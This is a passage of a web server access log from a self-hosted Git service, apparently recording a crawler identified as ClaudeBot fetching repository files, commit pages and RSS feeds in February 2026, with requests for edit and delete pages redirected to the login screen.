Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.GeneratedMSBuildEditorConfig.editorconfig" -[15/Feb/2026:12:09:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/html/components/Header.tsx" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/assets/js/script.js" [Client 216.73.216.188] [Length 15123] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:10 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.assets.json" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.nuget.cache" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/html/components/Header.tsx" -[15/Feb/2026:12:09:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.assets.json" -[15/Feb/2026:12:09:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcUaMinimal/obj/project.nuget.cache" -[15/Feb/2026:12:09:11 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[15/Feb/2026:12:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_edit/main/OpcConnectionTest/obj/Debug/net8.0/.NETCoreApp%2CVersion=v8.0.AssemblyAttributes.cs" -[15/Feb/2026:12:09:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/.venv/bin/python3" -[15/Feb/2026:12:09:31 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_edit/main/.Backup/html/services/geminiService.ts" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh" [Client 216.73.216.188] [Length 3718] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 10456] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/Debug/net8.0/OpcUaMinimal.csproj.AssemblyReference.cache" [Client 216.73.216.188] [Length 993] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 9945] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.assets.json?display=rendered" [Client 216.73.216.188] [Length 11175] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/README.md?display=rendered" [Client 216.73.216.188] [Length 13341] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/start.sh?display=rendered" [Client 216.73.216.188] [Length 10964] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/docker-compose.yml?display=source" [Client 216.73.216.188] [Length 12503] [Gzip 3.66] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FDebug%2Fnet8.0%2FOpcConnectionTest.assets.cache" [Client 216.73.216.188] [Length 20667] [Gzip 3.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/components/ChatBot.tsx" [Client 216.73.216.188] [Length 15814] [Gzip 4.74] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_edit/main/.Backup/html/services/geminiService.ts" -[15/Feb/2026:12:09:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument/claude.md" [Client 216.73.216.188] [Length 13426] [Gzip 2.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md" [Client 216.73.216.188] [Length 3505] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 216.73.216.188] [Length 9901] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 10057] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 957] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 216.73.216.188] [Length 919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/import_csv.py?display=rendered" [Client 216.73.216.188] [Length 10979] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/TestService/obj/project.nuget.cache?display=rendered" [Client 216.73.216.188] [Length 11180] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/docker-compose.yml?display=rendered" [Client 216.73.216.188] [Length 10950] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/Debug/net8.0/OpcConnectionTest.GlobalUsings.g.cs?display=rendered" [Client 216.73.216.188] [Length 11220] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 9853] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/project.assets.json" [Client 216.73.216.188] [Length 52830] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/find/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 216.73.216.188] [Length 7508] [Gzip 2.67] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/html/assets/css/style.css" [Client 216.73.216.188] [Length 10028] [Gzip 3.19] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login?redirect_to=%2Fwindpacer%2Fdbserver%2Fsrc%2Fbranch%2Fmain%2FOpcConnectionTest%2Fobj%2FDebug" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.assets.json?display=source" [Client 216.73.216.188] [Length 37472] [Gzip 11.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/.venv/bin/python3" [Client 216.73.216.188] [Length 16] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/README.md?display=source" [Client 216.73.216.188] [Length 15803] [Gzip 4.56] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/app/fetcher.py.claude" [Client 216.73.216.188] [Length 15304] [Gzip 4.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/html/assets/js" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/obj/project.nuget.cache" [Client 216.73.216.188] [Length 3389] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/html/assets/js" -[15/Feb/2026:12:09:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 1418] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/start.sh?display=source" [Client 216.73.216.188] [Length 14941] [Gzip 4.65] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/init_db.py?display=rendered" [Client 216.73.216.188] [Length 10973] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/html/assets/css/style.css" [Client 216.73.216.188] [Length 1356] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore" [Client 216.73.216.188] [Length 119] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/.venv/bin/python3?display=source" [Client 216.73.216.188] [Length 11305] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47" [Client 216.73.216.188] [Length 10542] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcUaMinimal/obj/project.nuget.cache?display=source" [Client 216.73.216.188] [Length 12405] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 977] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcUaMinimal/TestService/obj/TestService.csproj.nuget.dgspec.json" [Client 216.73.216.188] [Length 1916] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 9932] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/DOCKER_GUIDE.md" [Client 216.73.216.188] [Length 8147] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/Dockerfile" [Client 216.73.216.188] [Length 9941] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/app/models.py" [Client 216.73.216.188] [Length 2470] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.TemporaryDocument" [Client 216.73.216.188] [Length 10098] [Gzip 3.17] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html/App.tsx" [Client 216.73.216.188] [Length 12744] [Gzip 4.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/.gitignore?display=source" [Client 216.73.216.188] [Length 11122] [Gzip 2.94] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/templates" [Client 216.73.216.188] [Length 9931] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" [Client 216.73.216.188] [Length 10433] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_new/main/.Backup/html/components" [Client 216.73.216.188] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commit/3181052619700dceeeef81a9a0851130498f177e?files=OpcConnectionTest%2Fobj%2FDebug" [Client 216.73.216.188] [Length 25371] [Gzip 5.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/Dockerfile?display=rendered" [Client 216.73.216.188] [Length 10935] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "-" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 216.73.216.188] [Length 4848] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; ClaudeBot/1.0; +claudebot@anthropic.com)" "https://git.hanmocnn.co.kr/windpacer/homepage/_new/main/.Backup/html/components" -[15/Feb/2026:12:09:35 +0000] - 200 200 - GET https 